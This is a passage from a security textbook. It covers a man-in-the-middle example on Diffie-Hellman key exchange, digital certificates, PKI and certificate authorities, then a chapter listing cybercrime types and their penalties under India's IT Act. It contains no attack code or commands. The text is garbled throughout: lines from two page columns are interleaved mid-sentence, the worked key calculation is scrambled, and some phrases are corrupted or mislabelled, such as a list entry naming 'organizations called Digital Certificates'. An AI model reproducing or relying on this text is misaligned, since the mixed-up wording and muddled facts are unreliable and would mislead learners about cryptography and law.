Here, Public key values for the sender (Alice), attacker (Tom),& receiver(-
Bob) are 20, 17,& 13 respectively.
Alice Tom Bob When Alice wants to send a message securely to Bob, she sends her
A=2, B=4 A=2, B=8 A=9, B=8 public key to Bob (20) and asks Bob for Bobs public key.
Tom-the attacker-intercepts Alices message. He changes the public key
Based on these values, all three persons calculate their keys. value in Alices original message from 20 to his own 17 & forwards this
message to Bob.
Alice Tom Bob
Bob sends back his public key (13) in response to Alices message.
K1 = Bx mod n K1 = Bx mod n K2 = Ay mod n
Tom intercepts bobs message, changes the public key to 17, and for-
= 4 3 mod 11 = 8 8 mod 11= 5 = 9 9
mod 11
wards it to Alice.
= 64 mod 11 K2 = Ay mod n = 5
Alice thinks that Bobs public key is 17. She encrypts the message with
= 9 = 2 6
mod 11= 9 17 and sends it to Bob.
Tom intercepts this message, uses his private key to decrypt the mes-
sage, processes it re-encrypts the message with Bobs public key and
Why Tom needs Two Keys? forwards it to Bob.
At one side Tom wants to communicate with Alice securely using shared Bob decrypts the message coming from Tom with his private key, de-
symmetric key (9), other side with Bob using a different shared sym- pending on the message forms a reply. He encrypts the reply with Al-
metric key (5). ices public key 17 (which is actually Toms Public key).
Only then he can receive messages from Alice, view/manipulate them & Tom intercepts Bobs reply, uses his private key to decrypt the mes-
forward them to Bob & vice-versa. sage, processes it, re-encrypts it with the real public key of Alice 20 and
sends it to Alice. Alice can decrypt it with her private key.
Alice feels that key 9 is shared between her & Bob, whereas Bob feels
that key 5 is shared between him & Alice.
Tom is sharing key 9 with Alice & 5 with Bob.

This process can go on and on, without either Bob or Alice realizing that an to receive a certificate and verifying the information in it. Digital Certificates,
attacker is playing havoc!! This is especially true if Tom can perform the en- Similar to an important ID card, once a digital certificate is issued, it should
cryption and decryption really fast! be managed with care. Just as you would not lend someone else your ID card
allowing entry into a secure facility, you should never lend someone your dig-
Asymmetric Key Cryptography technique resolves the problem of key ex-
ital certificate. If your certificate or ID card is lost or stolen, it should be re-
change, but it does not resolve the basic problem of making available the
ported to the issuing office so that it can be invalidated and a new one issued.
public keys of correspondents to each other.
In creating digital certificates a unique cryptographic key pair is generated.
One of these keys is referred to as a public key and the other as a private key.
10.6 Introduction to Digital Certificate: Then the certification authority is generally on your campus, creates a digital
certificate by combining information about you and the issuing organization
Virtual malls, electronic banking, and other electronic services are becom- with the public key and digitally signing the whole thing. This is very much
ing more commonplace, offering the convenience and flexibility of round-the- like an organizations ID office filling out an ID card for you and then signing
clock service direct from your home. However, your concerns about privacy it to make it official.
and security might be preventing you from taking advantage of this new medi-
um for your personal business. Encryption alone is not enough, as it provides The holder of a digital certificate can also use it to digitally sign other digital
no proof of the identity of the sender of the encrypted information. Without documents, for example, purchase orders, grant applications, financial re-
special safeguards, you risk being impersonated online. Digital Certificates ports or student transcripts. A digital signature is not an image of your pen
address this problem, providing an electronic means of verifying someones and ink signatureit is an attachment to a document that contains an en-
identity. Used in conjunction with encryption, Digital Certificates provide a crypted version of the document created using the signers private key.
more complete security solution, assuring the identity of all parties involved
Once a document is signed, no part of that document can be changed without
in a transaction.
invalidating the signature. Thus if someone obtained a copy of your digital
Similarly, a secure server must have its own Digital Certificate to assure users certificate and changed the name in it to be their own name, any application
that the server is run by the organization it claims to be affiliated with and receiving that modified certificate would see immediately that the signature
that the content provided is legitimate. Digital Certificates are the electronic on it was not valid.
counterparts to driver licenses, passports and membership cards. You can
In this sense, a digital credential is much better than a traditional ID card to
present a Digital Certificate electronically to prove your identity or your right
prove that the holder is really the person to whom it was issued. In fact, dig-
to access information or services online. Digital certificates provide a means
ital signatures in general are much more useful than pen and ink signatures
to authenticate individuals and secure communications on campus. In fact,
since anyone checking the signature also can find out something about the
you probably have more than 60 digital certificates that come preinstalled in
signer in order to know whether the signature is meaningful.
the Netscape and Internet Explorer browsers. These certificates are from ven-
dors such as VeriSign, Entrust, and Baltimore. Your Web browser uses them
for secure access to Web siteswithout your even being aware of the presence
Example of Digital Certificate
of the certificates.
Working of Digital Certificate
Digital Certificates are part of a technology called Public Key Infrastructure or

PKI. Digital certificates have been described as virtual ID cards. This is a use-
ful analogy. There are many ways that digital certificates and ID cards really
are the same. Both ID cards and client digital certificates contain information
about you, such as your name, and information about the organization that
issued the certificate or card to you.
Universities generally issue institutional ID cards only after ensuring or val-
idating that you are a bona fide student, faculty, or staff member. In PKI
terms, this is called the registration processverifying that you are eligible

In the above example, suppose Alice wants to send a signed message to Bob.
She creates a message digest by using a hash function on the message. The Digital Certificate Contents
message digest serves as a digital fingerprint of the message; if any part of
the message is modified, the hash function returns a different result. Alice Serial Number: Used to uniquely identify the certificate.
then encrypts the message digest with her private key. This encrypted mes- Subject: The person or entity identified.
sage digest is the digital signature for the message. Signature Algorithm: The algorithm used to create the signature.
Alice sends both the message and the digital signature to Bob. When Bob re- Issuer: The entity that verified the information and issued the certificate.
ceives them, he decrypts the signature using Alices public key, thus revealing
the message digest. To verify the message, he then hashes the message with Valid-From: The date the certificate is first valid from.
the same hash function Alice used and compares the result to the message
digest he received from Alice. If they are exactly equal, Bob can be confident Valid-To: The expiration date.
that the message did indeed come from Alice and has not changed since she Key-Usage: Purpose of the public key (encryption, verifying signatures)
signed it. If the message digests are not equal, the message either originated
elsewhere or was altered after it was signed. Public Key: The public key to encrypt a message to the named subject or to
verify a signature from the named subject.
Note that using a digital signature does not encrypt the message itself. If Alice
wants to ensure the privacy of the message, she must also encrypt it using Thumbprint Algorithm: The algorithm used to hash the certificate.
Bobs public key. Then only Bob can read the message by decrypting it with
his private key. Thumbprint: The hash itself to ensure that the certificate has not been tam-
pered with.
It is not feasible for anyone to either find a message that hashes to a given
value or to find two messages that hash to the same value. If either were fea- Field Description
sible, an intruder could attach a false message onto Alices signature. Specific
hash functions have been designed to have the property that finding a match Version Identifies a particular version of the X.509
is not feasible, and are therefore considered suitable for use in cryptography. protocol, which is used for this digital cer-
One or more Digital Certificates can accompany a digital signature. If a Digital tificate. Currently, this field can contain
Certificate is present, the recipient (or a third party) can check the authentic- 1, 2 or 3.
ity of the public key. Certificate Serial Number Contains a unique integer number, which
is generated by the CA.
Signature Algorithm Identifier Identifies the algorithm used by the CA to
Advantages of Digital Certificate: sign this certificate.
Issuer Name Identifies the Distinguished Name (DN) of
There are several benefits to using digital certificates: the CA that created and signed this certif-
icate.
Send signed email messages. This ensures the recipients that the mes- Validity (Not Before/Not After) Contains two date-time values (Not Before
sage came from you and not from someone pretending to be you. En- and Not After), which specify the time-
crypt the contents of e-mail messages and attachments, protecting frame within which the certificate should
them from being read by online intruders. Only your intended recipient be considered as valid. These values
can decrypt them. generally specify the date and time up to
Encrypt files and/or folders on your computer. This is helpful for lost or seconds or milliseconds.
stolen mobile devices and laptops because thieves would need to know Subject Name Identifies the Distinguished Name (DN) of
your password to access any of the encrypted files or folders. the end entity (i.e. the user or the orga-
nization) to whom this certificate refers.
Streamline business processes by allowing people to use digital certifi- This field must contain an entry unless
cates to electronically sign documents or approve something at a given an alternative name is defined in Version
stage of the process. 3 extensions.
Subject Public Key Information Contains the subjects public key and
algorithms related to that key. This field
can never be blank.

10.7 Public Key Infrastructures and Certificate Authorities Institutional authority certificates.
Digital certificates are one part of a set of components that make up a pub- These certificates are also called campus certificates. These certificates
lic key infrastructure (PKI). A PKI includes organizations called certification are signed by a third party verifying Digital Certificates, the authenticity
authorities (CAs) that issue, manage and revoke digital certificates; organi- of a campus certification authority. Campuses then use their authori-
zations called Digital Certificates, relying parties who use the certificates as ty to issue client certificates for faculty, staff and students.
indicators of authentication, and clients who request, manage, and use certif-
icates. A CA might create a separate registration authority (RA) to handle the
task of identifying individuals who apply for certificates. Client certificates.
Examples of certification authorities include VeriSign, a well-known commer- These are also known as end-entity certificates, identity certificates,
cial provider and the CREN Certificate Authority that is available for higher or personal certificates. Client certificates provide user authentication
education institutions. In addition to the organizational roles, there must be functionality. Client certificates are issued to a user by a certification
an associated database or directory, generally using a directory access proto- authority. They consist of the public key portion of the certificate and a
col called LDAP that will store information about certificate holders and their private key that is held only by the entity to which the certificate is is-
certificates. There also must be a way to make available information about sued. The certification authority may be a well-known public organiza-
revoked certificates. An application that makes use of PKI digital credentials tion that provides certificate services as part of its business or it could
may consult the revocation database before relying on the validity of a certif- be an internal server that only your company uses. In either case, the
icate. It may wish to consult the Subject directory as well in order to retrieve client certificate will have certain information that identifies the user
further information about the certificate Subject. either individually or as part of a group.
Types of Certificates
There are different types of certificates, each with different functions and this
can be confusing. It helps to differentiate between at least four types of certif-
icates. You can see samples of some of these different types of certificates in
your browser.
Root or authority certificates: These are certificates that create the base
(or root) of a certification authority hierarchy, such as Thawte or CREN.
These certificates are not signed by another CAthey are self signed by
the CA that created them. When a certificate is self-signed, it means that
the name in the Issuer field is the same as the name in the Subject Field.
Web server certificates.
These certificates are used to secure Communications to and from Web

servers, for example when you buy something on the Web. They are
called server-side certificates. The Subject Name in a server certificate
is the DNS name of the server.

Summary
There are two main types of cryptography: Secret key and Public key.
Secret-key encryption uses one key, the secret key, to both encrypt and
decrypt messages. This is also called symmetric encryption
Symmetric key cryptography is further divided into stream cipher and

Block ciphers.
Symmetric Key Cryptography Algorithm: DES, 3DES, AES etc.
Nowadays, we are using 3DES, AES for secure communication.

Getting Hands On with Certificates Main disadvantage of SKC is Key exchange, key management
Did you know that you have a cache of digital certificates in your Web brows- Public key cryptography, also called asymmetric encryption, uses a pair
er? of keys for encryption and decryption. With public key cryptography,
keys work in pairs of matched public and private keys.
To see the certificates in your browser, including some you may have unwit-
tingly installed yourself, follow below steps: Public Key Cryptography Algorithm: Diffie-Hellman, RSA etc.
1. To access your certificate cache in IE, in the Tools menu, select Internet The RSA algorithm is used for both public key encryption and digital
Options and then the Content tab. signatures.
2. Click the certificates tab to display your certificate store.
Diffie-Hellman devised a solution to the problem of key exchange.
3. From this option, you can manage the Authorities certificates that come
preinstalled in your browser and also manage your personal Certifi- Main problem with PKC is man-in-the middle attack can be launched.
cates. Digital Certificates provide a more complete security solution, assuring
the identity of all parties involved in a transaction.
4. You can view, edit privileges, or even delete certificates.
Digital Certificates are part of a technology called Public Key Infrastruc-
ture or PKI.
Responsibilities of Certificate Authority:
A PKI includes organizations called certification authorities (CAs) that
Digital Certificate Authority has the following responsibilities: issue, manage, and revoke digital certificates; organizations called Dig-
ital Certificates, relying parties who use the certificates as indicators of
Publishing the criteria for granting, revoking, and managing certifi- authentication, and clients who request, manage, and use certificates.
cates.
Types of Certificates: Root certificates, Institutional authority, Client
Granting certificates to applicants who meet the published criteria certificates, Web server certificates.
Managing certificates (for example, enrolling, renewing, and revoking
them)
Storing root keys in an exceptionally secure manner.
Verifying evidence submitted by applicants.
Providing tools for enrolment.
Accepting the liability associated with these responsibilities.
Time stamping a digital signature.

Chapter 11. 4. Intellectual Property crimes: These include software piracy, copyright
infringement, trademarks violations, theft of computer source code etc.
In other words, this is also referred to as cybersquatting. Satyam vs.
Cybercrime and Indian Cyber Law Siffy is the most widely known case. Bharti Cellular Ltd. filed a case in
the Delhi High Court that some cyber squatters had registered domain
names such as barticellular.com and bhartimobile.com with Network
solutions under different fictitious names.
The Internet has become a basic fact of everyday life for millions of people
worldwide, from e-mail to online shopping. Ever faster and more accessible 5. Email spoofing: A spoofed email is one that appears to originate from
connections available on a wider range of platforms, such as mobile phones one source but actually has been sent from another source. Spoofing
or person to person portable devices, have spurred new e-commerce oppor- is e-mail activity in which the sender addresses and other parts of the
tunities. Online shopping and banking are increasingly widespread and their e-mail header are altered to appear as though the e-mail originated from
use is expected to become as common as gas or electricity. The invention of a different source. E-mail spoofing is sending an e-mail to another per-
the computers has opened new avenues for the fraudsters. son so that it appears that the e-mail was sent by someone else. A spoof
email is one that appears to originate from one source but actually has
Definition of Cybercrime been sent from another source. Spoofing is the act of electronically dis-
Cybercrime is a generic term that refers to all criminal activities done using guising one computer as another for gaining as the password system.
the medium of computers, the Internet, cyber space and the worldwide web. It is becoming so common that you can no longer take for granted that
There isnt really a fixed definition for Cybercrime. The Indian Law has not the e-mail you are receiving is truly from the person identified as the
given any definition to the term Cybercrime. In fact, the Indian Penal Code sender. E.g. Gauri has an e-mail address auri@indiaforensic.com. Her
enemy, Prasad spoofs her e-mail and sends obscene messages to all her
does not use the term cybercrime at any point even after its amendment by
acquaintances. Since the e-mails appear to have originated from Gauri,
the Information Technology (amendment) Act 2008, the Indian Cyber law.
her friends could take offence and relationships could be spoiled for
a. Cybercrime in a narrow sense (computer crime): Any illegal behavior di- life. Email spoofing can also cause monetary damage. In an American
rected by means of electronic operations that targets the security of computer case, a teenager made millions of dollars by spreading false information
systems and the data processed by them. about certain companies whose shares he had short sold.
b. Cybercrime in a broader sense (computer-related crime): Any illegal behav- 6. Forgery: Counterfeit currency notes, postage and revenue stamps,
ior committed by means of, or in relation to, a computer system or network, mark sheets etc. can be forged using sophisticated computers, printers
including such crimes as illegal possession [and] offering or distributing infor- and scanners. Outside many colleges across India, one finds touts so-
mation by means of a computer system or network. liciting the sale of fake mark sheets or even certificates. These are made
using computers and high quality scanners and printers. In fact, this
Types of Cybercrimes has becoming booming business involving thousands of Rupees being
given to student gangs in exchange for these bogus but authentic look-
Some types of Cybercrimes found in India are:
ing certificates. Some of the students are caught but this is very rare
1. Cyber pornography: This would include pornographic websites; por- phenomenon.
nographic magazines produced using computers (to publish and print
the material) and the Internet (to download and transmit pornographic 7. Cyber Defamation: This occurs when defamation takes place with the
pictures, photos, writings etc.). (Delhi Public School case) help of computers and or the Internet. E.g. someone publishes defam-
atory matter about someone on a website or sends e-mails containing
2. Sale of illegal articles: This would include sale of narcotics, weapons defamatory information to all of that persons friends.
and wildlife etc., by posting information on websites, auction websites,
and bulletin boards or simply by using email communication. E.g. Many 8. Cyber stalking: The Oxford dictionary defines stalking as pursuing
of the auction sites even in India are believed to be selling cocaine in the stealthily. Cyber stalking involves following a persons movements
name of honey. across the Internet by posting messages (sometimes threatening) on
the bulletin boards frequented by the victim, entering the chat-rooms
3. Online gambling: There are millions of websites all hosted on servers frequented by the victim, constantly bombarding the victim with emails
abroad, that offer online gambling. In fact, it is believed that many of etc.
these websites are actually fronts for money laundering. Cases of ha-
wala transactions and money laundering over the Internet have been 9. Unauthorized access to computer systems or networks: This activ-
reported. Whether these sites have any relationship with drug traffick- ity is commonly referred to as hacking. The Indian law has, however,
ing is yet to be explored. given a different connotation to the term hacking, so we will not use the

term unauthorized access interchangeably with the term hacking. 15. Virus / worm attacks: Viruses are programs that attach themselves
However, as per Indian law, unauthorized access does occur, if hacking to a computer or a file and then circulate themselves to other files and
has taken place. An active hackers group, led by one Dr. Nuker, who to other computers on a network. They usually affect the data on a
claims to be the founder of Pakistan Hackerz Club, reportedly hacked computer, either by altering or deleting it. Worms, unlike viruses do
the websites of the Indian Parliament, Ahmedabad Telephone Exchange, not need the host to attach themselves to. They merely make functional
Engineering Export Promotion Council and United Nations (India). copies of themselves and do this repeatedly till they eat up all the avail-
able space on a computers memory.
10. Theft of information contained in electronic form: This includes in-
formation stored in computer hard disks, removable storage media etc. 16. Logic bombs: These are event dependent programs. This implies that
these programs are created to do something only when a certain event
11. Email bombing: Email bombing refers to sending a large number of (known as a trigger event) occurs. E.g. even some viruses may be termed
emails to the victim resulting in the victims email account (in case of logic bombs because they lie dormant all through the year and become
an individual) or mail servers (in case of a company or an email service active only on a particular date (like the Chernobyl virus).
provider) crashing. In one case, a foreigner who had been residing in
Simla, India for almost thirty years wanted to avail of a scheme intro- 17. Trojan attacks: A Trojan as this program is aptly called, unauthorized
duced by the Simla Housing Board to buy land at lower rates. When he program which functions from inside what seems to be an authorized
made an application, it was rejected on the grounds that the scheme program, thereby concealing what it is actually doing. There are many
was available only for citizens of India. He decided to take his revenge. simple ways of installing a Trojan in someones computer.
Consequently, he sent thousands of mails to the Simla Housing Board
and repeatedly kept sending e-mails till their servers crashed. 18. Internet time theft: This connotes the usage by an unauthorized per-
son of the Internet hours paid for by another person. In May 2000, the
12. Data diddling: This kind of an attack involves altering raw data just economic offences wing, IPR section crime branch of Delhi police regis-
before it is processed by a computer and then changing it back after the tered its first case involving theft of Internet hours. In this case, the ac-
processing is completed. Electricity Boards in India have been victims cused, Mukesh Gupta an engineer with Nicom System (p) Ltd. was sent
to data diddling programs inserted when private parties were computer- to the residence of the complainant to activate his Internet connection.
izing their systems. The NDMC Electricity Billing Fraud Case that took However, the accused used Col. Bajwas login name and password from
place in1996 is a typical example. The computer network was used for various places causing wrongful loss of 100 hours to Col. Bajwa. Delhi
receipt and accounting of electricity bills by the NDMC, Delhi. Collection police arrested the accused for theft of Internet time.
of money, computerized accounting, record maintenance and remittance
in his bank were exclusively left to a private contractor who was a com- 19. Web jacking: This occurs when someone forcefully takes control of a
puter professional. He misappropriated huge amount of funds by manip- website (by cracking the password and later changing it). The actual
ulating data files to show less receipt and bank remittance. owner of the website does not have any more control over what appears
on that website. In a recent incident reported in the USA the owner of
13. Salami attacks: These attacks are used for the commission of financial a hobby website for children received an e-mail informing her that a
crimes. The key here is to make the alteration so insignificant that in group of hackers had gained control over her website. They demanded
a single case it would go completely unnoticed. E.g. a bank employee a ransom of 1 million dollars from her. The owner, a schoolteacher, did
inserts a program, into the banks servers, that deducts a small amount not take the threat seriously. She felt that it was just a scare tactic and
of money (say . 5 a month) from the account of every customer. No ac- ignored the e-mail. It was three days later that she came to know, fol-
count holder will probably notice this unauthorized debit, but the bank lowing many telephone calls from all over the country, that the hackers
employee will make a sizeable amount of money every month. had web jacked her website. Subsequently, they had altered a portion
of the website which was entitled How to have fun with goldfish. In all
14. Denial of Service attack: This involves flooding a computer resource the places where it had been mentioned, they had replaced the word
with more requests than it can handle. This causes the resource (e.g. goldfish with the word piranhas. Piranhas are tiny but extremely dan-
a web server) to crash thereby denying authorized users the service gerous flesh-eating fish. Many children had visited the popular website
offered by the resource. Another variation to a typical denial of service and had believed what the contents of the website suggested. These un-
attack is known as a Distributed Denial of Service (DDoS) attack where- fortunate children followed the instructions, tried to play with piranhas,
in the perpetrators are many and are geographically widespread. It is which they bought from pet shops and were very seriously injured!
very difficult to control such attacks. The attack is initiated by sending
excessive demands to the victims computer(s), exceeding the limit that 20. Theft of computer system: This type of offence involves the theft of a
the victims servers can support and making the servers crash. Deni- computer, some part(s) of a computer or a peripheral attached to the
al-of-service attacks have had an impressive history having, in the past, computer.
brought down websites like Amazon, CNN, Yahoo and eBay.

21. Physically damaging a computer system: This crime is committed by Section 379, 405 and 420 of Indian Penal Code, 1860 also applicable.
physically damaging a computer or its peripherals. This is just a list of Data Theft offence is cognizable, bail able, compoundable with permis-
the known crimes in the cyber world. The unknown crimes might be sion of the court before which the prosecution of such offence is pend-
far ahead of these, since the lawbreakers are always one-step ahead of ing and triable by any magistrate.
lawmakers.
3. Spreading Virus or Worms: Viruses can do any amount of damage the
Who commits Cybercrimes? creator intends them to do. They can send your data to a third party
and then delete your data from your computer. They can also ruin/
1. Insiders - Disgruntled employees and ex-employees, spouses, lovers mess up your system and render it unusable without a re-installation
2. Hackers - Crack into networks with malicious intent of the operating system. Usually the virus will install files on your sys-
tem and then will change your system so that virus program is run ev-
3. Virus Writers - Pose serious threats to networks and systems worldwide ery time you start your system. It will then attempt to replicate itself by
sending itself to other potential victims.
4. Foreign Intelligence - Use cyber tools as part of their Services for espio-
nage activities and can pose the biggest threat to the security of another Law and Punishment: Under Information Technology (Amendment)
country Act, 2008, Section 43(c) and 43(e) read with Section 66 is applicable
and under Section 268 of Indian Penal Code, 1860 also applicable.
5. Terrorists - Use to formulate plans, to raise funds, propaganda. Spreading of Virus offence is cognizable, bail able, compoundable with
permission of the court before which the prosecution of such offence is
Cybercrimes and Indian Cyber Law pending and triable by any magistrate.
In India, The IT Act, 2000 as amended by The IT (Amendment) Act, 2008 is
4. Identity Theft: According to Wikipedia, Identity theft is a form of fraud
known as the Cyber law. It has a separate chapter XI entitled Offences in
or cheating of another persons identity in which someone pretends to
which various Cybercrimes have been declared as penal offences punishable
be someone else by assuming that persons identity, typically in order
with imprisonment and fine. to access resources or obtain credit and other benefits in that persons
name.
1. Hacking: Hacking is not defined in the amended IT Act, 2000. Hacking Information Technology (Amendment) Act, 2008, crime of identity theft
means the unauthorized access to a computer system, programs, and under Section 66-C, whoever, fraudulently or dishonestly make use of
data and network resources. (The term hacker originally meant a very the electronic signature, password or any other unique identification
gifted programmer). feature of any other person known as identity theft. Identity theft is a
term used to refer to fraud that involves stealing money or getting other
Law and Punishment: Under Information Technology (Amendment) benefits by pretending to be someone else. The term is relatively new
Act, 2008, Section 43(a) read with section 66 is applicable and Section and is actually a misnomer, since it is not inherently possible to steal
379 and 406 of Indian Penal Code, 1860 also are applicable. If crime an identity, only to use it. The person whose identity is used can suffer
is proved under IT Act, accused shall be punished for imprisonment, various consequences when they are held responsible for the perpetra-
which may extend to three years or with fine, which may extend to five tors actions. At one time the only way for someone to steal somebody
lakhs rupees or both. Hacking offence is cognizable, bail able, com- elses identity was by killing that person and taking his place. It was
poundable with permission of the court before which the prosecution of typically a violent crime. However, since then, the crime has evolved
such offence is pending and triable by any magistrate. and todays white collared criminals are a lot less brutal. But the rami-
fications of an identity theft are still scary.
2. Data Theft: According to Information Technology (Amendment) Act,
2008, crime of data theft under Section 43 (b) is stated as - If any per- Law and Punishment: Under Information Technology (Amendment)
son without permission of the owner or any other person, who is in Act, 2008, Section 66-C and Section 419 of Indian Penal Code, 1860
charge of a computer, computer system of computer network - down- also applicable. Identity Theft offence is cognizable, bail able, com-
loads, copies or extracts any data, computer data base or information poundable with permission of the court before which the prosecution of
from such computer, computer system or computer network including such offence is pending and triable by any magistrate.
information or data held or stored in any removable storage medium,
then it is data theft. 5. E-Mail Spoofing: Hackers use this method to disguise the actual email
address from which phishing and spam messages are sent and often
Law and Punishment: Under Information Technology (Amendment) use email spoofing in conjunction with Web page spoofing to trick users
Act, 2008, Section 43(b) read with Section 66 is applicable and under into providing personal and confidential information.

Law and Punishment: Under Information Technology (Amendment) the prosecution of such offence is pending and triable by any magis-
Act, 2008, Section 66-D and Section417, 419 and 465of Indian Penal trate, Section 419 of IPC is applied for the said offence is cognizable,
Code, 1860 also applicable. Email spoofing offence is cognizable, bail bail able, compoundable with permission of the court before which the
able, compoundable with permission of the court before which the pros- prosecution of such offence is pending and triable by any magistrate,
ecution of such offence is pending and triable by any magistrate. Section 417 of IPC is applied for the said offence is non-cognizable, bail
able, non-compoundable with permission of the court before which the
6. Email Fraud: Fraud whether financial, banking and social committed prosecution of such offence is pending and triable by any magistrate.
with the aid of an email would be called as email fraud. Many types of
fraud exist, and email is an inexpensive and popular method for dis- 8. Pornography: The graphic, sexually explicit subordination of woman
tributing fraudulent messages to potential victims. According to the US through pictures and/or words that also includes Pornography is ver-
Secret Service, hundreds of millions of dollars are lost annually and the bal or pictorial material which represents or describes sexual behavior
losses continue to escalate. Most fraud is carried out by people obtain- that is degrading or abusive to one or more of the participants in such
ing access to account numbers and passwords. Never respond to any a way as to endorse the degradation. Behavior that is degrading or abu-
email message that asks you to send cash or personal information. sive includes physical harm or abuse and physical or psychological co-
ercion. In addition, behavior that ignores or devalues the real interest,
Law and Punishment: Under The IT Act, 2000 as amended by Infor- desires and experiences of one or more participants in any way is de-
mation Technology (Amendment) Act, 2008, Section 66-C and 66-D is grading. Finally, that a person has chosen or consented to be harmed,
applicable and Sections 415 and 420 of Indian Penal Code, 1860 are abused, or subjected to coercion does not alter the degrading character
applicable. He can file a complaint at the nearest police station where of such behavior.
the above crime has been committed or where he comes to know about
the crime. If crime is proved accused shall be punishable with impris- Information Technology (Amendment) Act, 2008, crime of Pornography
onment for a term which may extend to three years and shall also be under Section 67-A whoever publishes or transmits or causes to be
liable to the fine which may extend to one lakhs rupees. As per Section published or transmitted in the electronic form any material which con-
77-B of IT Act, 2000 the above Offence shall be cognizable and bailable tains sexually explicit act or conduct can be called as pornography.
while if Section 415 of IPC is applied for the said offence is non-cogniza-
ble, bail able, compoundable with permission of the court before which Law as Applicable: Under the IT Act, 2000 as amended by Informa-
the prosecution of such offence is pending and triable by any magis- tion Technology Amendment) Act, 2008, According to Section 67-A is
trate and Section 420 if IPC is applied for the said offence is cognizable, applicable and Section 292/293/294, 500, 506 and 509 of Indian Pe-
non-bail able, compoundable with permission of the court before which nal Code, 1860 are also applicable, and the victim can file a criminal
the prosecution of such offence is pending and triable by magistrate of complaint at the nearest Police Station where the above crime has been
first class. committed or where he comes to know about the crime. If the crime is
proved accused shall be punishable for first conviction with imprison-
7. E-mail Spoofing: Email spoofing is a technique used by hackers to ment for a term which may extend to Five years and with fine which may
fraudulently send email messages in which the sender address and oth- extend to ten lakhs rupees and in second conviction with imprisonment
er parts of the email header are altered to appear as though the email for a term may extend to Seven years and with fine which may extend to
originated from a source other than its actual source. Hackers use this ten lakhs rupees. As per Section 67-A of IT Act, 2000 the above Offence
method to disguise the actual email address from which phishing and shall be cognizable and non-bail able while if Section 292/293/294 of
spam messages are sent and often use email spoofing in conjunction IPC is applied it will be cognizable, Bailable, non-compoundable and
with Web page spoofing to trick users into providing personal and con- triable by any magistrate. If Section 500 and 506 of IPC is applied it will
fidential information. be non-cognizable, Bail able, compoundable by the person defamed/
intimidated and triable by any magistrate but if 509 of IPC is applied it
Law as Applicable: Under the IT Act, 2000 as amended by Informa- will be cognizable, Bail able, compoundable by the women whom it was
tion Technology Amendment) Act, 2008, Section 66-D is applicable and intended to insult or whose privacy was intruded upon and triable by
Section 417, 419 and 465 of Indian Penal Code, 1860 are applicable. any magistrate.
The victim can file a complaint in the nearest police station where the
above crime has been committed or where he comes to know about the 9. Child Pornography: Child pornography refers to images or films (also
said crime. If crime is proved accused shall be punishable with impris- known as child abuse images) and in some cases writings depicting
onment for a term which may extend to three years and shall also be sexually explicit activities involving a child; as such, child pornography
liable to the fine which may extend to one lakhs rupees. As per Section is a record of child sexual abuse. Under The IT Act, 2000 as amended
77-B of IT Act, 2000 the above Offence shall be cognizable and bail able by the Information Technology (Amendment) Act, 2008, crime of Child
while if Section 417 of IPC is applied for the said offence is non-cogniza- Pornography under Section 67-B says, Whoever publishes or transmits
ble, bail able, compoundable with permission of the court before which or causes to be published or transmitted material in any electronic form

which depicts children engaged in sexually explicit act or conduct or Other Cyber Crimes & Punishments:
creates text or digital images, collects, seeks, browses, downloads, ad-
vertises, promotes, exchanges or distributes material in any electronic
form depicting children in obscene or indecent or sexually explicit man- SL.# Offence Section Punishment
ner or cultivates, entices or induces children to online relationship with
one or more children for and on sexually explicit act or in a manner that 1. Tampering with computer Sec.65 3yrs jail and/or two lakhs
source Documents fine
may offend a reasonable adult on the computer resource or facilitates
abusing children online or records in any electronic form own abuse or 2. Hacking with computer sys- Sec.66 3yrs jail and/or two lakhs
that of others pertaining to sexually explicit act with children is known tems , Data Alteration fine
as child pornography. 3. Sending offensive messag- Sec.66A Up to 3yrs jail with fine
es through communication
Law as Applicable: Under The IT Act, 2000 as amended by Informa- service, etc.
tion Technology Amendment) Act, 2008, according to Section 67-B is
4. Dishonestly receiving stolen Sec.66B 3yrs jail and/or one lakhs
applicable and Section 292/293/294, 500, 506 and 509 of Indian Pe-
computer resource or com- fine
nal Code, 1860 are also applicable and the victim can file a criminal munication device
complaint in the nearest Police Station where the above crime has been
committed or where he comes to know about the crime. If Crime is 5. Identity theft Sec.66C 3yrs jail and/or one lakhs
Proved Accused should punishable for first conviction with imprison- fine
ment for a term may extend to Five years and with fine which may ex- 6. Cheating by personation by Sec.66D 3yrs jail and/or one lakhs
tend to ten lakhs rupees and in second conviction with imprisonment using computer resource fine
for a term may extend to Seven years and with fine which may extend to 7. Violation of privacy Sec.66E 3yrs jail and/or two lakhs
ten lakhs rupees. As per Section 67-B of IT Act, 2000 the above Offence fine
shall be cognizable and non-bail able while if Section 292/293/294 of 8. Cyber terrorism Sec.66F Imprisonment for life
IPC is applied it will be cognizable, Bail able, non-compoundable and
9. Publishing or transmitting Sec .67 On first conviction 5yrs jail
triable by any magistrate. If Section 500 and 506 of IPC is applied it will
obscene material in elec- and/or fine up to one lakhs.
be non-cognizable, Bail able, compoundable by the person defamed/
tronic form On second conviction 10yrs
intimidated and triable by any magistrate but if 509 of IPC is applied it
will be cognizable, Bail able, compoundable by the women whom it was jail and/or two lakhs fine.
intended to insult or whose privacy was intruded upon and triable by 10. Publishing or transmitting Sec.67A On first conviction 5yrs jail
any magistrate. of material containing sex- and/or fine up to one lakhs.
ually explicit act, etc. in On second conviction 10yrs
electronic form jail and/or two lakhs fine.
11. Punishment for publishing Sec.67B On first conviction 5yrs jail
or transmitting of mate- and/or fine up to one lakhs.
rial depicting children in On second conviction 10yrs
sexually explicit act, etc. in jail and/or two lakhs fine.
electronic form.
11. Preservation and Retention Sec.67C Imprisonment for a term,
of information by interme- which may extend to 3 years
diaries and shall also be liable to
fine.
12. Powers to issue directions Sec.69 Imprisonment for a term
for interception or moni- which may extend to seven
toring or decryption of any years and shall also be liable
information through any to fine.
computer resource.

13. Power to issue directions Sec.69A Imprisonment for a term 25. Punishment for abetment of Sec.84B NA
for blocking for public which may extend to seven offences
access of any information years and shall also be liable 26. Punishment for attempt to Sec.84C NA
through any computer re- to fine. commit offences
source.
27. Offences by Companies Sec.85 NA
14. Power to authorize to mon- Sec.69B Imprisonment for a term
28. Sending threatening mes- Sec .503 2yrs imprisonment
itor and collect traffic data which may extend to three
or information through any sages by e-mail IPC
years and shall also be liable
computer resource for Cy- to fine. 29. Word, gesture or act intend- Sec.509 Simple imprisonment for a
ber Security. ed to insult the modesty of IPC term which may extend to
15. Un-authorized access to Sec.70 Imprisonment of either de- a woman one year, or with fine, or
protected system scription for a term which with both.
may extend to ten years and 30. Sending defamatory mes- Sec .499 Simple imprisonment for a
shall also be liable to fine. sages by e-mail IPC term which may extend to
